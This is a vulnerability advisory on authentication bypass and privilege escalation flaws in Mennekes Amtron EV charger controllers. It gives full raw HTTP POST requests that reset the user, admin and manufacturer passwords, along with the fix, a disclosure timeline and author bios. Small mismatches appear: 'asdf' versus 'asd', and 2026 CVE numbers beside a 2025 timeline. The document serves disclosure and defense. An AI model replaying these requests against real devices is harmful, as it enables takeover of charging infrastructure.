Multiple Vulnerabilities in Mennekes Amtron Series

The Mennekes Amtron Series is affected by authentication bypass and privilege escalation vulnerabilities. An unauthenticated attacker can exploit a crafted POST request to change user account credentials, while an authenticated low-privileged attacker can similarly escalate access by overwriting manufacturer and admin account passwords. Successful exploitation can result in full device takeover or loss of access control over the charging infrastructure.

Vendor description

“For more than 80 years, MENNEKES has stood for quality electrical products and service throughout the world. When it comes to solutions that handle current intelligently and safely, we set the standard for innovation, quality, manufacturing and development.”

Source: https://www.mennekes.com/about/about-us

Vulnerable versions

Amtron Professional
Amtron Professional (Eichrecht)
Amedio Professional
Amtron Charge Control
Amtron Professional Twincharge
Smart-T PnC

Vulnerability overview

1) Authentication Bypass (CVE-2026-8979)
An unauthentication attacker can use a crafted POST request to change the password of the user account.

2) Privilege Escalation (CVE-2026-8980)
An authenticated attacker can use a crafted POST request to change the password of the manufacturer and admin account as low privileged user.

Proof of Concept

1) Authentication Bypass (CVE-2026-8979)

The following POST request can be used to change the password of the user account to “asdf”

POST /operator/operator HTTP/1.1
Host: 10.201.74.66
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
UserPwdPlain_custom=asdf

2) Privilege Escalation (CVE-2026-8980)

The following POST requests can be used to change the admin (operator) and manufacturer account password to “asdf”.

POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 60
Authorization: e81179e1-5e50-45d4-8ee6-27161dcf69d8
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"params":[{"key":"OperatorPwdPlain_custom","value":"asd"}]}

POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 59
Authorization: 526ee807-4295-46f3-a9e4-0f4bcac97af9
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"params":[{"key":"ManufacturerPwd_custom","value":"asd"}]}

Solution

Update to the newest Firmware.

Workaround

Restrict access to the device.

Technology Used

The vulnerabilities were manually verified on an emulated device by using “MEDUSA scalable firmware runtime” (www.medusa.re).

Contact Timeline

2025-02-24: Get in contact with psirt@mennekes.de
2025-02-25: Vulnerabilities get acknowledged and are forwarded to BENDER as they are the manufacturer for the devices.
2025-03-18: Ask for update regarding fixes, CVE numbers, fixed version and effected products. Response states that they will not create CVEs.
2025-05-28: Release of advisory.

Author(s)

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.

Thomas Weber

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.